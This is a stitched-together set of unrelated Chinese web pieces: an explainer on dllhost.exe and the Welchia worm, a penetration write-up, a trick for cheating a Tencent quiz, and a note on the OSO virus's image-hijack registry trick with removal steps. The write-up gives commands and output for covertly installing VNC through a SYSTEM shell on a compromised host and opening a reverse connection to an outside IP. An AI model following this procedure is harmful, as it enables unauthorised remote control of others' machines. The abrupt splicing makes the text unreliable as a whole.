dllhost.exe 解释
　　
　　dllhost.exe是什么？
　　dllhost.exe是运行COM+的组件，即COM代理，运行Windows中的Web和FTP服务器必须有这个东西。
　　
　　什么时候会出现dllhost.exe？
　　运行COM+组件程序的时候就会出现。例如江民KV2004
　　
　　冲击波杀手又是怎么一回事？
　　冲击波杀手借用了dllhost.exe作为进程名，但是由于Windows不允许同一个目录下有同名文件的存在，因此，冲击波杀手把病毒体：dllhost.exe放到了C:\Windows\System32\Wins目录里面（Windows 2000是C:\WINNT\System32\Wins，全部假设系统安装在C盘），但是真正的dllhost.exe应该放 在C:\Windows\System32（Windows 2000是C:\WINNT\System32）
　　
　　换句话说就是：冲击波（Worm.WelChia）为了迷惑用户，避免病毒的执行体被进程管理器终止，采用了dllhost.e xe这个和Windows组件一样的名字，但是并不是说进程里面出现dllhost.exe就等于感染了worm.welchi a
　　
　　再看看这里的FAQ吧
　　
　　第一个误区————进程出现Dllhost.exe就等于中了病毒
　　Dllhost.exe是系统文件，但是进程里面出现Dllhost.exe进程不等于中了病毒
　　
　　第二个误区————一见Dllhost.exe进程就杀死
　　其实这样做是不好的。很多程序都需要Dllhost.exe，例如KV2004实时监控运行的时候或IIS在解析一些ASP文件 的时候，进程中都会出现Dllhost.exe
　　
　　之所以大家恐惧Dllhost.exe进程，恐怕是由于冲击波（杀手）的问题。
　　其实冲击波（杀手）只不过采取了一个偷梁换柱的方法。因为任务管理器里面无法看出进程中exe文件的路径，所以让大家在分析问题 的时候出现一些偏差。
　　
　　感染冲击波（杀手）的典型特征不是进程中出现Dllhost.exe，而是RPC服务出现问题（冲击波）和System32\w ins目录里面出现svchost.exe和dllhost.exe文件（冲击波杀手）。注意路径！！
　　
　　那么，Dllhost.exe是什么呢？Dllhost.exe是 COM+ 的主进程。正常下应该位于system32目录里面和system32\dllcache目录里面。而system32\win s目录里面是不会有dllhost.exe文件的。

这篇文章是为渗透而写的，当初获得了一个Systemm权限的Shell，但是因为目标机器有种种限制，只开80、443等端口，其它端口打不开，这个时候就需要一个GUI交互界面的程序来控制这台机器了，所以给这台机器安装VNC将是一个不错的选择。

准备
准备工作：需要一个交互控制环境，最好获得对方Systemm权限的Shell，下载VNC-3.3.7版本，剥离远程安装所需的文件。在一台机器安装VNC并注册为系统服务，设置好VNC密码，剥离我们所需要的远程安装的文件。
C:\WINNT\Systemm32>dir "C:\Program Files\RealVNC\VNC"
驱动器 C 中的卷没有标签。
卷的序列号是 9464-50C4

C:\Program Files\RealVNC\VNC 的目录

2004-07-19 12:18 .
2004-07-19 12:18 ..
2003-02-19 10:16 61,440 othread2.dll
2004-06-27 14:26 1,174 VNC.reg
2004-07-19 01:16 57,344 VNChooks.dll
2004-07-19 01:12 307,200 winVNC.exe
4 个文件 427,158 字节
2 个目录 3,266,203,648 可用字节
这里我们只需要VNChooks.dll、WinVNC.exe、Othread2.dll三个文件，然后从注册表中导出VNC的设置VNC.reg。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"PortNumber"=dword:00000000
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:98,e6,55,1f,82,42,48,9e
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

TIPS：如果你要渗透的系统是XP，那么就要在XP上安装VNC并按照上面的步骤剥离VNC远程安装所需文件。

实践
目的是要验证VNC远程安装与正向连接，验证VNC反向连接。目标IP：xxx.xxx.xxx.xxx，已获得一个System Shell，现在我们在目标系统上下载并安装VNC：
C:\WINNT\Systemm32>ver
ver
Microsoft Windows 2000 [Version 5.00.2195]
C:\WINNT\Systemm32>whoami
whoami
NT AUTHORITY\SYSTEMM

C:\WINNT\Systemm32>riv //解压VNC
riv
Extracting from C:\WINNT\Systemm32\riv.exe
Create By Kaka
Mail:Kaka@0x557.org
Homepage:http://www.0x557.org

Extracting othread2.dll OK
Extracting VNC.reg OK
Extracting VNChooks.dll OK
Extracting winVNC.exe OK
All OK
然后在命令行下安装VNC：
C:\WINNT\Systemm32>winVNC –install //安装。删除为WinVNC -remove
winVNC -install
C:\WINNT\Systemm32>c:\winnt\regedit /s VNC.reg //把VNC注册表内容导入，即配置、密码等
c:\winnt\regedit /s VNC.reg
C:\WINNT\Systemm32>net start winVNC //启动VNC服务
net start winVNC
VNC Server ……（乱码，内容是安装成功）
VNC Server ……（乱码，内容是安装成功）

C:\WINNT\Systemm32>netstat -an | find ":5800" //查看VNC安装成功与否。
netstat -an | find ":5800"
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING
C:\WINNT\Systemm32>
安装成功后，我们直接测试VNC的正向连接功能，连上去，如图1所示：

图1
连接成功。请注意看图片的右下角，并没有VNC的图标出现。似乎很顺利，接下来应该测试VNC的反向连接，按照VNC的帮助，反向连接格式应该是这样的：
IP：开VNCviewer.exe的监听模式 VNCviewer.exe –listen 默认监听本机的5500端口。
WinVNC –connect VNCviewer监听的IP
问题在这里出现了，耗费了我几个小时，晚上8点到第二天凌晨1点左右都是在搞这个反向连接，痛苦。下边是我的分析思路：运行中的WinVNC也就是安装好VNC后，系统启动的VNC程序：
C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
Process PID User
winVNC.exe 3104 NT AUTHORITY\SYSTEMM //注意启动winVNC的系统身份
我在SYSTEMM的Shell环境下输入：
WinVNC –connect myip
以为会在自己开了VNCviewer监听的机器上出现VNC反连过来的得GUI界面，结果确是失望的。查看远程机器的VNC进程如下：
C:\WINNT\Systemm32>winVNC -connect 222.65.110.236
winVNC -connect 222.65.110.236

C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
winVNC.exe 3104 NT AUTHORITY\SYSTEMM //注意启动winVNC的系统身份
WinVNC.exe 2392 NT AUTHORITY\SYSTEMM
不能反向连接，这不是我想要的，因为我确实是实验过VNC是可以反连的，而且是从内网连接到外网的机器。继续看资料，在本机实验，问题出在反向连接是可以连接到远程开VNCviewer监听的机器，但是在这个有System权限的Shell下却怎么也反向连接不过来！
百思不得其解，随手在本机敲上VNC反连的命令，看着远程计算机出现我的机器桌面，突然想到反连不成功会不会跟这个有关系？反连需要系统某个用户的身份，及其配置?使用Runas看看（允许用户用其他权限运行指定工具和程序，而不是用户当前登录提供的权限）。
C:\WINNT\Systemm32>runas /profile /env /user:FILE-PRINT\edu "winVNC -connect 222.
65.110.236"
runas /profile /env /user:FILE-PRINT\edu "winVNC -connect 222.65.110.236"
……（看不懂的乱码）
C:\WINNT\Systemm32>pulist | find "winVNC.exe"
pulist | find "winVNC.exe"
winVNC.exe 3104 NT AUTHORITY\SYSTEMM
利用Runas使用这台电脑的一个用户身份执行VNC反向连接失败，提示返回消息韩文没有看懂，也没有继续追究下去，因为我又找到一个别的工具Runasex.exe。
C:\WINNT\Systemm32>runasex edu edu winVNC “-connect 222.65.110.**”
runasex edu edu winVNC "-connect 222.65.110.**"
winVNC Execute Succussifully.
C:\WINNT\Systemm32>netstat -an | find ":5500"
netstat -an | find ":5500"
TCP 211.232.169.**:2503 222.65.110.**:5500 ESTABLISHED
Local
C:\>netstat -an | find ":5500"
netstat -an | find ":5500"
TCP 0.0.0.0:5500 0.0.0.0:0 LISTENING
TCP 10.0.0.100:5500 211.232.169.**:2503 ESTABLISHED

在我本机出现了期待已久的VNC远程连接界面！成功！
最后得出结论：WinVNC反连的时候，必须要被执行一次，即系统有一个VNC的运行进程，反连在此基础上运行才能成功。而且WinVNC的反连必须要以一个用户的身份来连接System权限不可以启动WinVNC的反连。更多的功能需要自己动手去实践，如有问题欢迎与我讨论。

参考文章：
http://www.digitaloffense.net/docs/Remote.VNC/remote_installation.txt Remote VNC Installation
http://www.tburke.net/info/misc/VNC_remote.htm How to install VNC on a remote PC
http://www.darkage.co.uk/VNC/howtos/fromcmdshell.htm Install VNC from the command shell
http://www.netxeyes.org/VNC.html VNC的远程安装

      腾讯科技讯 3月22日将迎来新一届“世界水日”，同时，3月22日至3月28日又是第二十一届“中国水周”，为提高公民节约用水和保护水资源意识，腾讯网特举办世界水日有奖知识竞赛，欢迎网友积极参与，并有机会获得腾讯网为大家准备的精美礼品。

竞赛题说明：

      世界水日有奖知识竞赛题共分为A、B、C三套，网友可任意选择答题，每一套竞赛题分为5关，每关10道题，闯过第二关才有可能得奖。

      世界水日有奖知识竞赛题A

      世界水日有奖知识竞赛题B

      世界水日有奖知识竞赛题C

      活动日期：

      3月22日至3月28日

      4月3日公布获奖名单

      评奖办法：

      对成功闯关的网友进行电脑随机抽取，为保证顺利发放奖品，请参加活动的网友能按要求详细填写联系方式。

详细请看 http://tech.qq.com/a/20080319/000389.htm

看看如何利用

我门打开问题。把鼠标放到答案上，注意观察，状态栏的 信息。你回发现

有 javascript:gonext('0', '2853_53843.htm') 之类的，注意看0





可能是程序员的疏忽,多少对计算机有了解的人应该知道'1'.'0'的 作用了, 分别代表了 正确‘1’  错误 ‘0’

这样我门就可以一路 11111111111 哈哈

     在针对杀毒软件方面，OSO病毒还采用了一种新技术，这种技术被成为镜像劫持，通过这种技术也能够将杀毒软件置于死地。


      所谓的镜像劫持，就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项，例如Rav.exe。然后再创建一个子键“Debugger="C:\\WINDOWS\\system32\\drivers\\ceffen.com”。以后只要用户双击 Rav.exe就会运行OSO的病毒文件ceffen.com，类似文件关联的效果。

autorun.inf 和oobtwtr.exe手动去除法:

１．首先下载autoruns；(http://www.greendown.cn/soft/2151.html)

２．然后打开运行　镜像劫持；

３．接下来单击开始｜运行｜输入cmd，回车｜x：回车（x是你的盘符）

４．输入attrib autorun.inf -s -h -r

           attrib oobtwtr.exe -s -h -r (去隐藏属性)；

５．输入del　autorun.inf

　　　　del　oobtwtr.exe（删除）．